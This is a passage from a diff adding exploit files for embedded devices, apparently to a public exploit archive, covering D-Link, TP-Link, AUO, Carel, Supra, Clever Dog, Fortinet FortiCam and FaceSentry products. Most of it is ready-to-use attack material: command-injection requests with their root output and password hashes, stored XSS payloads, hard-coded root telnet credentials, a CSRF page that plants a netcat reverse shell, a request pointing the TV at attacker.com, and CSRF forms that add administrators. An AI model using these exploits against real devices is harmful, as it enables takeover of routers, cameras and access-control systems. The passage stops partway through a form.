+URL Path :
+[+] /admin.cgi?action=config_restore
+
+Vulnerable POST Form Data Parameter:
+[+] configRestore
+[+] configServerip
+===========================
+Device Firmware version :
+[+] 4.2.0.15
+
+Hardware Version :
+[+] A1
+
+Device name :
+[+] D-Link AP
+
+Product Identifier : 
+[+] WLAN-EAP
+
+Proof of Concept (PoC):
+=======================
+The security vulnerability can be exploited by local authenticated attackers.
+there is no input validation on the POST Form Data Parameter "configRestore"
+and the Form Data Parameter "configServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.
+The attacker has to know the credentials in order to access the Panel .
+For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot2.jpg .
+
+
+--- PoC Session Logs ---
+POST /admin.cgi?action=config_restore HTTP/1.1
+Host: localhost
+Connection: keep-alive
+Content-Length: 357
+Cache-Control: max-age=0
+Origin: http://localhost
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; 
+User-Agent: Xxxxxxxx
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer: http://localhost/admin.cgi?action=config_restore
+Accept-Encoding: gzip, deflate
+Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
+Cookie: sessionHTTP=UQAafLpviZXbWDQpJAnrNmEJoFQIBAcX; clickedFolderFrameless=43%5E
+
+------WebKitFormBoundary4ZAwHsdySFjwNXxE
+Content-Disposition: form-data; name="optprotocol"
+
+up
+------WebKitFormBoundary4ZAwHsdySFjwNXxE
+Content-Disposition: form-data; name="configRestore"
+
+;whoami;
+------WebKitFormBoundary4ZAwHsdySFjwNXxE
+Content-Disposition: form-data; name="configServerip"
+
+;cat /var/passwd;cat /var/passwd
+------WebKitFormBoundary4ZAwHsdySFjwNXxE--
+
+
+----------->Response----------->
+
+HTTP/1.0 200 OK
+Content-Type: text/html; charset=UTF-8
+
+/usr/bin/tftp: option requires an argument -- r
+BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.
+
+Usage: tftp [OPTIONS] HOST [PORT]
+
+Transfer a file from/to tftp server
+
+Options:
+	-l FILE	Local FILE
+	-r FILE	Remote FILE
+	-g	Get file
+	-p	Put file
+	-b SIZE	Transfer blocks of SIZE octets
+
+sh: whoami: not found
+sh: whoami: not found
+root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
+admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
+nobody:x:99:99:nobody:/:/bin/false
+
+Note : for testing put the values in the fields like this : 
+;command1;same_command1;command2;command2
+
+
+----+Discovered By Raki Ben Hamouda----+
+
+
+Document Title:
+===============
+D-Link DWL-2600AP - (Authenticated) OS Command Injection (Save Configuration)
+
+Product & Service Introduction:
+===============================
+The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.
+
+Affected Product(s):
+====================
+Product: D-Link DWL-2600AP (Web Interface)
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+HIGH
+
+Base Score (CVSS):
+===============
+7.8
+
+===============
+Request Method(s):
+[+] POST
+
+URL Path :
+[+] /admin.cgi?action=config_save
+
+Vulnerable POST Form Data Parameter:
+[+] configBackup
+[+] downloadServerip
+==========================
+Device Firmware version :
+[+] 4.2.0.15
+
+Hardware Version :
+[+] A1
+
+Device name :
+[+] D-Link AP
+
+Product Identifier : 
+[+] WLAN-EAP
+
+Proof of Concept (PoC):
+=======================
+The security vulnerability can be exploited by remote or local authenticated attackers.
+there is no input validation on the POST Form Data Parameter "configBackup"
+and the Form Data Parameter "downloadServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.
+The attacker has to know the credentials in order to access the Panel .
+For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot3.jpg .
+
+--- PoC Session Logs ---
+POST /admin.cgi?action=config_save HTTP/1.1
+Host: localhost
+Connection: keep-alive
+Content-Length: 114
+Cache-Control: max-age=0
+Origin: http://localhost
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Xxxxxxxx
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer: http://localhost/admin.cgi?action=config_save
+Accept-Encoding: gzip, deflate
+Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
+Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E
+
+check_tftp=up&configBackup=;whoami;whoami;.xml&downloadServerip=;cat /var/passwd;cat /var/passwd
+
+
+----------->Response----------->
+
+HTTP/1.0 200 OK
+Content-Type: text/html; charset=UTF-8
+
+/usr/bin/tftp: option requires an argument -- r
+BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.
+
+Usage: tftp [OPTIONS] HOST [PORT]
+
+Transfer a file from/to tftp server
+
+Options:
+	-l FILE	Local FILE
+	-r FILE	Remote FILE
+	-g	Get file
+	-p	Put file
+	-b SIZE	Transfer blocks of SIZE octets
+
+sh: whoami: not found
+sh: whoami: not found
+sh: .xml: not found
+root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
+admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
+nobody:x:99:99:nobody:/:/bin/false
+
+Note : for testing put the values in the fields like this : 
+;command1;same_command1;command2;etc...
+
+
+----+Discovered By Raki Ben Hamouda----+
+
+
+Document Title:
+===============
+D-Link DWL-2600AP - (Authenticated) OS Command Injection (Upgrade Firmware)
+
+Product & Service Introduction:
+===============================
+The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.
+
+Affected Product(s):
+====================
+Product: D-Link DWL-2600AP (Web Interface)
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+HIGH
+
+Base Score (CVSS):
+===============
+7.8
+
+===============
+Request Method(s):
+[+] POST
+
+URL Path :
+[+] /admin.cgi?action=upgrade
+
+Vulnerable POST Form Data Parameter:
+[+] firmwareRestore
+[+] firmwareServerip
+
+===========================
+Device Firmware version :
+[+] 4.2.0.15
+
+Hardware Version :
+[+] A1
+
+Device name :
+[+] D-Link AP
+
+Product Identifier : 
+[+] WLAN-EAP
+
+Proof of Concept (PoC):
+=======================
+The security vulnerability can be exploited by local authenticated attackers.
+there is no input validation on the POST Form Data Parameter "firmwareRestore"
+and the Form Data Parameter "firmwareServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.
+The attacker has to know the credentials in order to access the Panel .
+For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot1.jpg .
+
+--- PoC Session Logs ---
+
+POST /admin.cgi?action=upgrade HTTP/1.1
+Host: localhost
+Connection: keep-alive
+Content-Length: 525
+Cache-Control: max-age=0
+Origin: http://localhost
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data;
+User-Agent: xxxxxxxxw
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer: http://localhost/admin.cgi?action=upgrade
+Accept-Encoding: gzip, deflate
+Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
+Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E
+
+------WebKitFormBoundaryBy0MsFaBOhdU6YJL
+Content-Disposition: form-data; name="optprotocol"
+
+up
+------WebKitFormBoundaryBy0MsFaBOhdU6YJL
+Content-Disposition: form-data; name="firmwareRestore"
+
+;whoami;whoami
+------WebKitFormBoundaryBy0MsFaBOhdU6YJL
+Content-Disposition: form-data; name="firmwareServerip"
+
+;cat /var/passwd;cat /var/passwd
+------WebKitFormBoundaryBy0MsFaBOhdU6YJL
+Content-Disposition: form-data; name="update.device.packet-capture.stop-capture"
+
+up
+------WebKitFormBoundaryBy0MsFaBOhdU6YJL--
+
+----------->Response----------->
+
+HTTP/1.0 200 OK
+Content-Type: text/html; charset=UTF-8
+
+/usr/bin/tftp: option requires an argument -- r
+BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.
+
+Usage: tftp [OPTIONS] HOST [PORT]
+
+Transfer a file from/to tftp server
+
+Options:
+	-l FILE	Local FILE
+	-r FILE	Remote FILE
+	-g	Get file
+	-p	Put file
+	-b SIZE	Transfer blocks of SIZE octets
+
+sh: whoami: not found
+sh: whoami: not found
+root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
+admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
+nobody:x:99:99:nobody:/:/bin/false
+
+Note : for testing put the values in the fields like this : 
+;command1;same_command1;command2;etc...
+----+Discovered By Raki Ben Hamouda----+
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46882.txt b/exploits/hardware/webapps/46882.txt
new file mode 100644
index 000000000..9cec28ad1
--- /dev/null
+++ b/exploits/hardware/webapps/46882.txt
@@ -0,0 +1,88 @@
+# Exploit Title: TL-WR840N v5 00000005
+
+# Date: 5/10/2019
+
+# Exploit Author: purnendu ghosh
+
+# Vendor Homepage: https://www.tp-link.com/
+
+# Software Link: https://www.amazon.in/TP-LINK-TL-WR840N-300Mbps-Wireless-External/dp/B01A0G1J7Q
+
+# Category: Hardware
+
+# Firmware Version:0.9.1 3.16 v0001.0 Build 171211 Rel.58800n
+
+# Hardware Version:TL-WR840N v5 00000005
+
+# Tested on: Windows 10
+
+# CVE :CVE-2019-12195.
+
+ 
+# Proof Of Concept:
+
+TP-Link TL-WR840N v5 00000005 devices allow XSS via the network name. The attacker must
+log into the router by breaking the password and going to the admin
+login page by THC-HYDRA to get the network name. With an XSS payload,
+the network name changed automatically and the internet connection was
+disconnected. All the users become disconnected from
+the internet.
+
+------------------------------------------
+
+[Additional Information]
+To ensure your network to be safe from Renaming and internet disconnection.
+
+------------------------------------------
+
+[Vulnerability Type]
+Cross Site Scripting (XSS)
+
+------------------------------------------
+
+[Vendor of Product]
+tp-link
+
+------------------------------------------
+
+[Affected Product Code Base]
+router - TL-WR840N v5 00000005
+
+------------------------------------------
+
+[Affected Component]
+Wi-Fi network configured through the router
+
+------------------------------------------
+
+[Attack Type]
+Remote
+
+------------------------------------------
+
+[Impact Denial of Service]
+true
+
+------------------------------------------
+
+[Impact Information Disclosure]
+true
+
+------------------------------------------
+
+[Attack Vectors]
+Logged in to the router by breaking the password and goes to the admin
+login page by THC-HYDRA and got the network name. Using Burp Suite
+professional version 1.7.32 captured the network name and selected XSS
+payload against the name and started attacking .as a result the
+network name changed automatically and internet connection was
+disconnected in the network. All the users become disconnected from
+internet.
+
+------------------------------------------
+
+[Discoverer]
+purnendu ghosh
+
+[Reference]
+https://www.tp-link.com/us/security
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46896.txt b/exploits/hardware/webapps/46896.txt
new file mode 100644
index 000000000..b459929da
--- /dev/null
+++ b/exploits/hardware/webapps/46896.txt
@@ -0,0 +1,17 @@
+# Exploit Title: AUO Solar Data Recorder - Stored XSS
+# Date: 2019-04-16
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.auo.com/zh-TW
+# Version: AUO Solar Data Recorder all versions prior to v1.3.0
+# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
+
+# 1. Description:
+# In AUO Solar Data Recorder web page,
+# user can modify the system settings by access the /protect/config.htm.
+# Attackers can inject malicious XSS code in parameter "addr" of post data.
+# The value of addr will be stored in database, so that cause a stored XSS vulnerability.
+
+# 2. Proof of Concept:
+# Browse http://<Your<http://%3cYour> Modem IP>/protect/config.htm
+# Send this post data:
+ addr= "<script>alert(123)</script>&dhcp=1
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46897.txt b/exploits/hardware/webapps/46897.txt
new file mode 100644
index 000000000..4fc299586
--- /dev/null
+++ b/exploits/hardware/webapps/46897.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Carel pCOWeb - Stored XSS
+# Date: 2019-04-16
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.carel.com/
+# Version: Carel pCOWeb all versions prior to B1.2.1
+# Tested on: It is a proprietary devices: http://www.carel.com/product/pcoweb-card
+
+# 1. Description:
+# In Carel pCOWeb web page,
+# user can modify the system configuration by access the /config/pw_snmp.html.
+# Attackers can inject malicious XSS code in post data.
+# The XSS code will be stored in database, so that cause a stored XSS vulnerability.
+
+# 2. Proof of Concept:
+# Browse http://<Your<http://%3cYour> Modem IP>/config/pw_snmp.html
+# Send this post data:
+%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
+# The post data in URL decode format is:
+?script:setdb('snmp','syscontact')="><script>alert(123)</script>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46898.txt b/exploits/hardware/webapps/46898.txt
new file mode 100644
index 000000000..775fc672b
--- /dev/null
+++ b/exploits/hardware/webapps/46898.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Carel pCOWeb - Unprotected Storage of Credentials
+# Date: 2019-04-16
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.carel.com/
+# Version: Carel pCOWeb all versions prior to B1.2.1
+# Tested on: It is a proprietary devices: http://www.carel.com/product/pcoweb-card
+
+# 1. Description:
+# The devices, Carel pCOWeb, store plaintext passwords,
+# which may allow sensitive information to be read by someone with access to the device.
+
+# 2. Proof of Concept:
+# Browse the maintain user page in website:
+# http://<Your<http://%3cYour> Modem IP>/config/pw_changeusers.html
+# The user's information include Description, Username and Password.
+# In user page, we can find out that user passwords stored in plaintext.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46957.txt b/exploits/hardware/webapps/46957.txt
new file mode 100644
index 000000000..5e75e54fc
--- /dev/null
+++ b/exploits/hardware/webapps/46957.txt
@@ -0,0 +1,20 @@
+# Exploit Title: AUO Solar Data Recorder - Incorrect Access Control
+# Date: 2019-04-16
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.auo.com/zh-TW
+# Version: AUO Solar Data Recorder all versions prior to v1.3.0
+# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
+# CVE: CVE-2019-11367
+
+# 1. Description:
+# In AUO Solar Data Recorder web page, it's use HTTP Basic Access Authentication.
+# Once user access the files which are under path http://<host>/protect/,
+# the website will response the plaintext account and password in WWW-Authenticate attribute.
+# Attackers is capable to login AUO Solar Data Recorder successfully.
+
+# 2. Proof of Concept:
+# Access the files which are under path http://<host>/protect/ of AUO Solar Data Recorder.
+# The website use HTTP Basic Access Authentication,
+# and response the plaintext account and password in WWW-Authenticate attribute.
+# By using the account and password in HTTP response,
+# anyone can login AUO Solar Data Recorder successfully.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46971.txt b/exploits/hardware/webapps/46971.txt
new file mode 100644
index 000000000..b8a2c3419
--- /dev/null
+++ b/exploits/hardware/webapps/46971.txt
@@ -0,0 +1,59 @@
+Exploit Title: Remote file inclusion
+# Date: 03-06-2019
+# Exploit Author: Dhiraj Mishra
+# Vendor Homepage: https://supra.ru
+# Software Link: https://supra.ru/catalog/televizory/televizor_supra_stv_lc40lt0020f/
+# CVE: CVE-2019-12477
+# References:
+# https://nvd.nist.gov/vuln/detail/CVE-2019-12477
+# https://www.inputzero.io/2019/06/hacking-smart-tv.html
+
+Summary:
+Supra Smart Cloud TV allows remote file inclusion in the openLiveURL
+function, which allows a local attacker to broadcast fake video without any
+authentication via a /remote/media_control?action=setUri&uri=URI
+
+Technical Observation:
+We are abusing `openLiveURL()` which allows a local attacker to broadcast
+video on supra smart cloud TV. I found this vulnerability initially by
+source code review and then by crawling the application and reading every
+request helped me to trigger this vulnerability.
+
+Vulnerable code:
+
+     function openLiveTV(url)
+      {
+      $.get("/remote/media_control",
+{m_action:'setUri',m_uri:url,m_type:'video/*'},
+       function (data, textStatus){
+       if("success"==textStatus){
+        alert(textStatus);
+       }else
+       {
+        alert(textStatus);
+       }
+      });
+      }
+
+Vulnerable request:
+
+    GET /remote/media_control?action=setUri&uri=
+http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1
+    Host: 192.168.1.155
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0)
+Gecko/20100101 Firefox/66.0
+    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+    Accept-Language: en-US,en;q=0.5
+    Accept-Encoding: gzip, deflate
+    Connection: close
+    Upgrade-Insecure-Requests: 1
+
+To trigger the vulnerability you can send a crafted request to the URL,
+
+http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8
+
+Although the above mention URL takes (.m3u8) format based video. We can use
+`curl -v -X GET` to send such request, typically this is an unauth remote
+file inclusion. An attacker could broadcast any video without any
+authentication, the worst case attacker could leverage this vulnerability
+to broadcast a fake emergency message.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46993.txt b/exploits/hardware/webapps/46993.txt
new file mode 100644
index 000000000..230dbba27
--- /dev/null
+++ b/exploits/hardware/webapps/46993.txt
@@ -0,0 +1,27 @@
+1. Advisory Information
+========================================
+Title: Clever Dog Smart Camera
+Vendor Homepage: http://www.cleverdog.com.cn/
+Tested on Camera types	: DOG-2W, DOG-2W-V4
+Vulnerability: Hardware- Multiple Vulnerabilities
+Date: 14/06/2019
+Author: Alex Akinbi      Twitter: @alexakinbi 
+
+1. Unauthenticated file disclosure:
+========================================
+An attacker on the local network has unauthenticated access to the internal SD card via HTTP service on port 8000. The HTTP web server on the camera allows an attacker to download video archive recorded and saved on the external memory card attached. 
+For example: http://192.168.1.81:8000/20190606
+
+2. Telnet Backdoor using default credentials:
+========================================
+An attacker on the network can login remotely to the camera and gain root access. The device ships with hard-coded credentials, accessible from a telnet login prompt using credentials username: " root" and password: "12345678". These credentials work on all devices.
+
+3. Login password sent over network unencrypted using Clever Dog App:
+========================================
+Using a packet sniffer, an attacker on the same network can capture data packets and view
+captured user login password MD5 hash. A weak password can be cracked and used to login to the user account.
+
+
+4. SOLUTION
+========================================
+Contact the vendor for further information regarding the proper mitigation of this vulnerability.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47033.html b/exploits/hardware/webapps/47033.html
new file mode 100644
index 000000000..5b36854f5
--- /dev/null
+++ b/exploits/hardware/webapps/47033.html
@@ -0,0 +1,60 @@
+# Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF
+# Date: 2019-06-19
+# Exploit Author: @XORcat
+# Vendor Homepage: https://fortinet.com/
+# Software Link: Customer Account Required
+# Version: v1.2.0.0
+# Tested on: Linux
+# CVE : TBA
+
+<html>
+    <!-- FCM-MB40 CSRF to RCE as root, by Aaron Blair (@xorcat) 
+
+Full details: https://xor.cat/2019/06/19/fortinet-forticam-vulns/
+
+Follow the following steps to demonstrate this PoC:
+
+1. Replace IP addresses in Javascript code to repr	esent your testing
+   environment.
+2. Launch a `netcat` listener on the attacker's host using `nc -nvlp
+   1337`
+3. Ensure the "admin" user's browser is logged in to the FCM-MB40.
+   * Note: all modern browsers will cache Basic Authentication
+     credentials (such as those used by the FCM-MB40) even if the
+     FCM-MB40's administration page is closed.
+4. Open the crafted HTML document using the "admin" user's
+browser. 
+   * Note: In an attack scenario, this step would be performed by
+     implanting the code into a legitimate webpage that the "admin"
+     user visits, or by tricking the "admin" user into opening a page
+     which includes the code.
+5. Note that the `netcat` listener established in step 2. has received
+   a connection from the camera, and that it is presenting a `/bin/sh`
+   session as root.
+   * Note: type `id` in the `netcat` connection to verify this.
+
+_Note: After this issue has been exploited, the state of the system will
+have changed, and future exploitation attempts may require
+modification._
+-->
+    <head>
+        <script>
+const sleep = (milliseconds) => {
+    return new Promise(resolve => setTimeout(resolve, milliseconds))
+};
+var sed_url = 'http://192.168.1.20/cgi-bin/camctrl_save_profile.cgi?num=9&name=a%20-e%20s/^if.*/nc\\t192.168.1.10\\t1337\\t-e\\t\\/bin\\/sh\\nexit/%20../cgi-bin/ddns.cgi%20&save=profile';
+var execute_url = 'http://192.168.1.20/cgi-bin/ddns.cgi';
+
+var sed_img = document.createElement("img");
+sed_img.src = sed_url;
+
+sleep(400).then(() => {
+    var execute_img = document.createElement("img");
+    execute_img.src = execute_url;
+});
+        </script>
+    </head>
+    <body>
+        <h1>Welcome to my non-malicious website.</h1>
+    </body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47064.txt b/exploits/hardware/webapps/47064.txt
new file mode 100644
index 000000000..5239143c2
--- /dev/null
+++ b/exploits/hardware/webapps/47064.txt
@@ -0,0 +1,123 @@
+FaceSentry Access Control System 6.4.8 Remote Command Injection
+
+
+Vendor: iWT Ltd.
+Product web page: http://www.iwt.com.hk
+Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
+                  Firmware 5.7.2 build 568 (Algorithm A14)
+                  Firmware 5.7.0 build 539 (Algorithm A14)
+
+Summary: FaceSentry 5AN is a revolutionary smart identity
+management appliance that offers entry via biometric face
+identification, contactless smart card, staff ID, or QR-code.
+The QR-code upgrade allows you to share an eKey with guests
+while you're away from your Office and monitor all activity
+via the web administration tool. Powered by standard PoE
+(Power over Ethernet), FaceSEntry 5AN can be installed in
+minutes with only 6 screws. FaceSentry 5AN is a true enterprise
+grade access control or time-and-attendance appliance.
+
+Desc: FaceSentry suffers from an authenticated OS command
+injection vulnerability using default credentials. This can
+be exploited to inject and execute arbitrary shell commands
+as the root user via the 'strInIP' and 'strInPort' parameters
+(POST) in pingTest and tcpPortTest PHP scripts.
+
+==============================================================
+/pingTest.php:
+--------------
+8:  if (!isAuth('TestTools','R')){
+9:      echo "No Permission";
+10:     include("footer.php");
+11:     exit;
+12:  }
+13:
+14: if(isset($_POST["strInIP"])){
+15:     $strInIP = $_POST["strInIP"];
+16: }else{
+17:     $strInIP = "";
+18: }
+19:
+20: $strOperationResult = "";
+21: if ($strInIP != ""){
+22:
+23:    $out = array();
+24:    exec("sudo ping -c 4 $strInIP",$out);
+25:    $result = "";
+26:    foreach($out as $line){
+27:        $result = $result.$line."<br>";
+28:    }
+
+--------------------------------------------------------------
+/tcpPortTest.php:
+-----------------
+14: if (isset($_POST["strInIP"])){
+15:     $strInIP = $_POST["strInIP"];
+16: }else{
+17:     $strInIP = "";
+18: }
+19: if (isset($_POST["strInPort"])){
+20:     $strInPort = $_POST["strInPort"];
+21: }else{
+22:     $strInPort = "";
+23: }
+..
+..
+53: $strOperationResult = "";
+54: if ($strInIP != "" and $strInPort != ""){
+55:     $fp = fsockopen($strInIP, $strInPort, $errno, $errstr, 10);
+56:     system("date>>".TCP_PORT_TEST);
+57:     if (!$fp) {
+58:         $strOperationResult = getDisplay("TestTools.TCPPortTestFail")." $errstr ($errno)";
+59:         system("echo -e \"Unable to connect to $strInIP:$strInPort\">>".TCP_PORT_TEST);
+60:     } else {
+61:         fclose($fp);
+62:         $strOperationResult = getDisplay("TestTools.TCPPortTestSucces");
+63:         system("echo -e \"Successfully connected to $strInIP:$strInPort\">>".TCP_PORT_TEST);
+64:     }
+65: }
+==============================================================
+
+Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
+           Linux 3.4.113-sun8i (armv7l)
+           PHP/7.0.30-0ubuntu0.16.04.1
+           PHP/7.0.22-0ubuntu0.16.04.1
+           lighttpd/1.4.35
+           Armbian 5.38
+           Sunxi Linux (sun8i generation)
+           Orange Pi PC +
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5523
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5523.php
+
+
+28.05.2019
+
+--
+
+
+$ curl -X POST 'http://192.168.11.1/tcpPortTest.php' \
+       --data 'strInIP=1.2.3.4`sudo id > garbage.txt`&strInPort=80' \
+       -H 'Cookie: PHPSESSID=21t4idf15fnkd61rerql9al4n3'
+
+$ curl http://192.168.11.1/garbage.txt
+uid=0(root) gid=0(root) groups=0(root)
+
+
+--------------------------------------------------------------------------------
+
+
+$ curl -X POST 'http://192.168.11.1/pingTest.php' \
+       --data 'strInIP=;sudo id' \
+       -H 'Cookie: PHPSESSID=21t4idf15fnkd61rerql9al4n3' \
+       |grep uid
+
+  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
+                                 Dload  Upload   Total   Spent    Left  Speed
+100  7726    0  7697  100    29  10180     38 --:--:-- --:--:-- --:--:-- 10181
+<font color='red'>Ping Test Fail! (;sudo id)<br>uid=0(root) gid=0(root) groups=0(root)<br></font><div id="six_tab_pages_nav" class="six_tab_pages_nav">
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47065.txt b/exploits/hardware/webapps/47065.txt
new file mode 100644
index 000000000..b1e2e2ee3
--- /dev/null
+++ b/exploits/hardware/webapps/47065.txt
@@ -0,0 +1,148 @@
+FaceSentry Access Control System 6.4.8 Cross-Site Request Forgery
+
+
+Vendor: iWT Ltd.
+Product web page: http://www.iwt.com.hk
+Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
+                  Firmware 5.7.2 build 568 (Algorithm A14)
+                  Firmware 5.7.0 build 539 (Algorithm A14)
+
+Summary: FaceSentry 5AN is a revolutionary smart identity
+management appliance that offers entry via biometric face
+identification, contactless smart card, staff ID, or QR-code.
+The QR-code upgrade allows you to share an eKey with guests
+while you're away from your Office and monitor all activity
+via the web administration tool. Powered by standard PoE
+(Power over Ethernet), FaceSEntry 5AN can be installed in
+minutes with only 6 screws. FaceSentry 5AN is a true enterprise
+grade access control or time-and-attendance appliance.
+
+Desc: The application interface allows users to perform certain
+actions via HTTP requests without performing any validity checks
+to verify the requests. This can be exploited to perform certain
+actions with administrative privileges if a logged-in user visits
+a malicious web site.
+
+Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
+           Linux 3.4.113-sun8i (armv7l)
+           PHP/7.0.30-0ubuntu0.16.04.1
+           PHP/7.0.22-0ubuntu0.16.04.1
+           lighttpd/1.4.35
+           Armbian 5.38
+           Sunxi Linux (sun8i generation)
+           Orange Pi PC +
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5524
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5524.php
+
+
+28.05.2019
+
+--
+
+
+CSRF change administrator password:
+-----------------------------------
+<html>
+  <body>
+  <script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
+    <form action="http://192.168.11.1/personalSetting.php" method="POST">
+      <input type="hidden" name="strInAction" value="updateUser" />
+      <input type="hidden" name="strInUserID" value="administrator" />
+      <input type="hidden" name="isChangePwd" value="1" />
+      <input type="hidden" name="strInLanguage" value="Eng" />
+      <input type="hidden" name="strInPassword" value="t00tw00t />
+      <input type="hidden" name="strInConfirmPassword" value="t00tw00t" />
+      <input type="submit" value="Submit" />
+    </form>
+  </body>
+</html>
+
+
+CSRF add admin:
+---------------
+<html>
+  <body>
+  <script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
+    <form action="http://192.168.11.1/userList.php?" method="POST">
+      <input type="hidden" name="strInAction" value="addUser" />
+      <input type="hidden" name="strInUserID" value="Testinugs" />
+      <input type="hidden" name="strInUserFunctionPermissionGroupID" value="Admin" />
+      <input type="hidden" name="strInDescription" value="CSRFd" />
+      <input type="hidden" name="strInLanguage" value="Eng" />
+      <input type="hidden" name="strInPassword" value="123123" />
+      <input type="hidden" name="strInConfirmPassword" value="123123" />
+      <input type="hidden" name="strInStatus" value="Active" />
+      <input type="submit" value="Submit" />
+    </form>
+  </body>
+</html>
+
+
+Change administrator password via different path:
+-------------------------------------------------
+<html>
+  <body>
+  <script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
+    <form action="http://192.168.11.1/userList.php?" method="POST">
+      <input type="hidden" name="strInAction" value="updateUser" />
+      <input type="hidden" name="strInPageNo" value="0" />
+      <input type="hidden" name="strInUserID" value="administrator" />
+      <input type="hidden" name="isChangePwd" value="1" />
+      <input type="hidden" name="strInDescription" value="Default&#32;Sys&#46;&#32;Admin" />
+      <input type="hidden" name="strInUserFunctionPermissionGroupID" value="Admin" />
+      <input type="hidden" name="strInLanguage" value="Eng" />
+      <input type="hidden" name="strInStatus" value="Active" />
+      <input type="hidden" name="strInPassword" value="123456" />
+      <input type="hidden" name="strInConfirmPassword" value="123456" />
+      <input type="hidden" name="strEditPageNo" value="" />
+      <input type="submit" value="Submit" />
+    </form>
+  </body>
+</html>
+
+
+Add special card:
+-----------------
+<html>
+  <body>
+  <script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
+    <form action="http://192.168.11.1/specialCard.php?" method="POST">
+      <input type="hidden" name="strInSpecialCardID" value="deadbeef" />
+      <input type="hidden" name="strInSpecialCardStatus" value="" />
+      <input type="hidden" name="strInSpecialCardEnrollHigh" value="1" />
+      <input type="hidden" name="strInSpecialCardEnrollLow" value="1" />
+      <input type="hidden" name="strInSpecialCardRescue" value="1" />
+      <input type="hidden" name="strInSpecialCardOpenDoor" value="1" />
+      <input type="hidden" name="strInSpecialCardReboot" value="1" />
+      <input type="hidden" name="strInSpecialCardShutDown" value="1" />
+      <input type="hidden" name="strInAction" value="addNewSpecialCard" />
+      <input type="hidden" name="strInPageNo" value="0" />
+      <input type="hidden" name="strEditPageNo" value="" />
+      <input type="hidden" name="strInNewSpecialCard" value="deadbeef" />
